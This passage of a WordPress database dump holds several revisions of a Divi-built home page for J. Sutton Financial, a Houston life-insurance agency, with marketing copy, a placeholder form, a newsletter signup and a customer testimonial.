_builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Your policy could start at just .67¢ a day.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Share your email with us and every few weeks we\'ll send some life wisdom your way.</p>[/et_pb_text][et_pb_signup button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_signup][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-19 02:58:50','2023-03-19 02:58:50','',138,'http://cmdev-site1.com/?p=367',0,'revision','',0),(366,1,'2023-03-19 02:58:36','2023-03-19 02:58:36','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-scaled.jpg\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>Planning for a <em>better </em>financial future</p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>We\'re unlike other life insurance experiences you have had. </p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"row\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><!-- [et_pb_line_break_holder] -->Form Goes Here<!-- [et_pb_line_break_holder] --></p>[/et_pb_code][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>We have your back. And american income life has ours. </p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><strong>Just because something is essential, doesn’t mean it has to cost more than a cup of coffee</strong></p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Your policy could start at just .67¢ a day.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" title_text=\"Cell phone subscribe photo New Green b3d04e and new blue 3e5ac0\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" column_structure=\"1_2,1_2\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\"][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<p>Share your email with us and every few weeks we\'ll send some life wisdom your way.</p>[/et_pb_text][et_pb_signup _builder_version=\"4.20.2\" _module_preset=\"default\" button_text=\"Subscribe to our Newsletter!\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_signup][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][et_pb_blog _builder_version=\"4.20.2\" _module_preset=\"default\" posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_blog][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][et_pb_testimonial _builder_version=\"4.20.2\" _module_preset=\"default\" author=\"Ehis - Houston, TX\" hover_enabled=\"0\" sticky_enabled=\"0\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-19 02:58:36','2023-03-19 02:58:36','',138,'http://cmdev-site1.com/?p=366',0,'revision','',0),(517,1,'2023-03-26 19:52:21','2023-03-26 19:52:21','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#000000\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial\" typing_effect=\", an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" global_colors_info=\"{}\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"2px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#cccac7\" custom_padding=\"25px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"86px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_padding=\"85px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||103px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||-4px|||\" custom_padding=\"112px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Proudly Headquartered in Houston, Texas</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-26 19:52:21','2023-03-26 19:52:21','',138,'http://cmdev-site1.com/?p=517',0,'revision','',0),(369,1,'2023-03-19 03:01:36','2023-03-19 03:01:36','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" global_colors_info=\"{}\" custom_padding=\"23px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-scaled.jpg\" hover_enabled=\"0\" global_colors_info=\"{}\" column_structure=\"1_2,1_2\" custom_padding=\"24px||231px|||\" sticky_enabled=\"0\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_margin=\"||27px||false|false\" sticky_enabled=\"0\"]<p>Planning for a <em>better </em>financial future</p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"row\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\" custom_margin=\"-3px|auto||auto||\" min_height=\"187.1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><!-- [et_pb_line_break_holder] -->Form Goes Here<!-- [et_pb_line_break_holder] --></p>[/et_pb_code][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>We have your back. And american income life has ours. </p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><strong>Just because something is essential, doesn’t mean it has to cost more than a cup of coffee</strong></p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Your policy could start at just .67¢ a day.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Share your email with us and every few weeks we\'ll send some life wisdom your way.</p>[/et_pb_text][et_pb_signup button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_signup][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-19 03:01:36','2023-03-19 03:01:36','',138,'http://cmdev-site1.com/?p=369',0,'revision','',0),(374,1,'2023-03-19 03:04:25','2023-03-19 03:04:25','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-scaled.jpg\" custom_padding=\"24px||231px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<p>Planning for a <em>better </em>financial future</p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row admin_label=\"row\" _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto||auto||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p><!-- [et_pb_line_break_holder] -->Form Goes Here<!-- [et_pb_line_break_holder] --></p>[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p>We have your back. And american income life has ours. </p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" admin_label=\"Row\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><strong>Just because something is essential, doesn’t mean it has to cost more than a cup of coffee</strong></p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Your policy could start at just .67¢ a day.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Share your email with us and every few weeks we\'ll send some life wisdom your way.</p>[/et_pb_text][et_pb_signup button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" 